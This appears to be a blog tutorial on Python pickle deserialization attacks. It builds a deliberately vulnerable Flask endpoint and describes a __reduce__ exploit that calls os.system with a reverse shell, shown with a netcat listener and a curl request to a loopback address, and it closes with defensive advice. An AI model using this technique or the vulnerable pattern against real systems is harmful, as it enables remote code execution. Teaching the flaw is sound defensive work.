Exploiting Python pickles
In a recent challenge I needed to get access to a system by exploiting the way Python deserializes data using the pickle
module. In this article I want to give a quick introduction of how to pickle/unpickle data, highlight the issues that can arise when your program deals with data from untrusted sources and “dump” my own notes.
For running the example code I’m using Python 3.8.2 on macOS 10.15; the demonstration of the reverse shell is just a connect-back to a loopback address.
TL;DR: Never unpickle data from sources you don’t trust. Otherwise you open your app up to a relatively simple way of remote code execution.
What is pickle
?
In Python, the pickle
module lets you serialize and deserialize data. Essentially, this means that you can convert a Python object into a stream of bytes and then reconstruct it (including the object’s internal structure) later in a different process or environment by loading that stream of bytes.
When consulting the Python docs for pickle
one cannot miss the following warning:
Warning: The pickle module is not secure. Only unpickle data you trust.
Let’s find out why that is and how unpickling untrusted data could ruin your day.
How to dump and load?
In Python you can serialize objects by using pickle.dumps()
:
The pickled representation we’re getting back from dumps
will look like this:
b'\x80\x04\x95\x19\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x06pickle\x94\x8c\x02me\x94K\x01K\x02K\x03e.'
And now reading the serialized data back in…
…will give us our list object back:
['pickle', 'me', 1, 2, 3]
What is actually happening behind the scenes is that the byte-stream created by dumps
contains opcodes that are then one-by-one executed as soon as we load the pickle back in. If you are curious how the instructions in this pickle look like, you can use pickletools
to create a disassembly: pickletools.dis(pickled)
>>> pickled = pickle.dumps(['pickle', 'me', 1, 2, 3])
>>> import pickletools
>>> pickletools.dis(pickled)
0: \x80 PROTO 4
2: \x95 FRAME 25
11: ] EMPTY_LIST
12: \x94 MEMOIZE (as 0)
13: ( MARK
14: \x8c SHORT_BINUNICODE 'pickle'
22: \x94 MEMOIZE (as 1)
23: \x8c SHORT_BINUNICODE 'me'
27: \x94 MEMOIZE (as 2)
28: K BININT1 1
30: K BININT1 2
32: K BININT1 3
34: e APPENDS (MARK at 13)
35: . STOP
highest protocol among opcodes = 4
Controlling the behavior of pickling/unpickling
Not every object can be serialized (e.g. file handles) and pickling and unpickling certain objects (like functions or classes) comes with restrictions. The Python docs give you a good overview what can and cannot be pickled.
While in most cases you don’t need to do anything special to make an object “picklable”, pickle
still allows you to define a custom behavior for the pickling process for your class instances.
Reading a bit further down in the docs we can see that implementing __reduce__
is exactly what we would need to get code execution, when viewed from an attacker’s perspective:
The
__reduce__()
method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the “reduce value”). […] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order:
- A callable object that will be called to create the initial version of the object.
- A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. […]
So by implementing __reduce__
in a class which instances we are going to pickle, we can give the pickling process a callable plus some arguments to run. While intended for reconstructing objects, we can abuse this for getting our own reverse shell code executed.
Creating a vulnerable app
Now that we have a basic idea of how to create dangerous data to unpickle, let’s build a vulnerable app for demonstration purposes.
We’ll use the web framework Flask to create a small web application with one route.
Let’s install Flask in a new virtual environment:
# setup virtualenv
virtualenv venv --python=/your/path/to/python
# activate
source venv/bin/activate
# install Flask
pip install Flask
And now create app.py
:
At /hackme
we implement a POST route that takes form data pickled
. The data comes encoded in base64 (for transfer), is decoded and then unpickled.
Let’s run the app with flask run
and then prepare our malicious pickled data to send.
Creating the exploit
As described above we want to create a class that implements __reduce__
and then serialize an instance of that class.
We’ll call our class RCE
and let its __reduce__
method return a tuple of a callable and a tuple of arguments (as per the mentioned docs).
Our callable will be os.system
and the argument a common reverse shell snippet using a named pipe, that will run on our macOS demo machine.
Now let’s run the exploit script to create a base64 encoded pickle byte stream:
$ python exploit.py
b'gASVbgAAAAAAAACMBX...
If you run pickletools.dis
again, you will see the system
callable plus arguments and the REDUCE
opcode (R
).
Sending the payload
Finally, we can start a netcat listener and send the payload to our listening Flask application:
# netcat listener for reverse shell in separate window/pane
nc -nvl 1234
# Send request
curl -d "pickled=gASVbgAAAAAAAACMBX..." http://127.0.0.1:5000/hackme
After sending the http request to /hackme
, our code will execute and give us a shell back.
Lesson from this demonstration: don’t unpickle untrusted data. It doesn’t matter if you receive this pickled data from anonymous users over the network or if it’s passed to you to restore a session or program state.
If you need to work with untrusted data – depending on your use case – consider signing the data if it could have been modified on the way to you or on disk, or choose a different (safer) serialization method altogether (like JSON), as per the docs. When storing pickles on the filesystem it is also worth checking the file permissions to prevent privilege escalations through modification of those pickles.
To learn more, I recommend watching the BlackHat 2011 talk “Sour Pickles, A serialised exploitation guide in one part” by Marco Slaviero. He describes in detail the (un)pickling process, the pickle virtual machine parts, and how to craft more general shellcodes using a custom toolset.
Like to comment? Feel free to send me an email or reach out on Twitter.
Did this or another article help you? If you like and can afford it, you can buy me a coffee (3 EUR) ☕️ to support me in writing more posts. In case you would like to contribute more or I helped you directly via email or coding/troubleshooting session, you can opt to give a higher amount through the following links or adjust the quantity: 50 EUR, 100 EUR, 500 EUR. All links redirect to Stripe.